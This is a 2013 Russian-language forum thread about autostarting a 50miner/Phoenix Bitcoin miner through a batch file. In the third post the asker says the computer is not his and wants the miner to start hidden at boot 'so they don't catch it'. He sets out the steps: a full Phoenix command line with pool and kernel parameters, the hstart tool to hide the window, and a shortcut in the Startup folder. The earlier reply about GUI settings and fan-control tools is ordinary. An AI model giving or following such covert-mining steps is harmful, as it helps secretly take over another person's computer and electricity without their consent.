Перейти к содержимому

YoBit.Net

Фотография

Батник для 50miner.org

50miner.org Батник автозапуск майнера

• Авторизуйтесь для ответа в теме
Сообщений в теме: 3

#1 xDi

xDi

Новичок

• Пользователи
  • Pip
  • 3 сообщений

Отправлено 28 April 2013 - 12:43

Всем привет! Народ помогите новичку сделать батник для автозапуска майнера от 50miner.org при включении компьютера. Карта стоит радеон HD 6930.

Вот что в нем писать какие параметры надо указать??? Можно ли прописать в нем скорость вентилятора чтобы не напрягал и при этом выставить скорость майнера чтобы карту не спалить???

• 0

#2 BigScal

BigScal

Новичок

• Пользователи
  • Pip
  • 26 сообщений

Отправлено 28 April 2013 - 18:24

xDi,

Вообще сама программа 50miner имеет графический интерфейс, и как таковой батник писать не нужно, все настройки задаются по умолчанию, либо вручную в окне программы.

По данному адресу (http://50miner.org/ru/) на первой картинке изображено основное окно программы, вверху поставь галочку в пункте "Расширенные" и ты увидишь расширенные параметры для настройки, как изображено на третьем изображении. А далее обрати внимание на 7 кнопок сверху справа. Потыкай по ним, посмотри какую информацию и возможности они тебе дадут.

На вкладке оверклокинга ты сможешь наблюдать за нагрузкой карты, за температурой, а также вручную настроить скорость вращения вертушек на видеокарте. Но для тонкой настройки вращения вертушек я рекомендую другие утилиты, например замечательную прогу SpeedFan. Если соберёшься разгонять карту, то лучше используй другие программы, н.р., MSI Afterburner. Кстати в MSI Afterburner также можно тонко настроить скорость вращения вертушек видеокарточек.

• 0

#3 xDi

xDi

Новичок

• Пользователи
  • Pip
  • 3 сообщений

Отправлено 28 April 2013 - 21:22

BigScal, Спасибо за ответ, но все это я как бы уже освоил и параметры подобрал какие нужны. Мне вообщем надо сделать так чтобы при включении компа запускался майнер скрытно при включении компа, т.к. комп не мой скажем так) Поэтому как я уже вычитал нужно сделать батник и скачать phoenix правильно?

А чтобы не палили скачать http://www.ntwind.com/software/hstart/

и сделать так:

Phoenix:
1. Переходим в папку с фениксом
2. Создаем txt-файл и вписываем в него:
phoenix -u логин@pool.50btc.com:8332 -k phatk2 BFI_INT=0 FASTLOOP VECTORS AGGRESSION=8 WORKSIZE=128 DEVICE=0

3. расширение меняем на bat  и кидаем ярлык на батник в Автозагрузку.

И еще моменты, в батнике WORKSIZE=128 ставить(для майнинга биткоинов)? и как в нем прописать скорость вентилятора?

AGGRESSION=8 - это типа ползунка в проге 50miner т.е. чем больше агрессия тем больше хешей?

Я правильно все понял?

Сообщение отредактировал xDi: 28 April 2013 - 21:41

• 0

#4 xDi

xDi

Новичок

• Пользователи
  • Pip
  • 3 сообщений

Отправлено 30 April 2013 - 14:09

тема закрыта сам допер)

• 0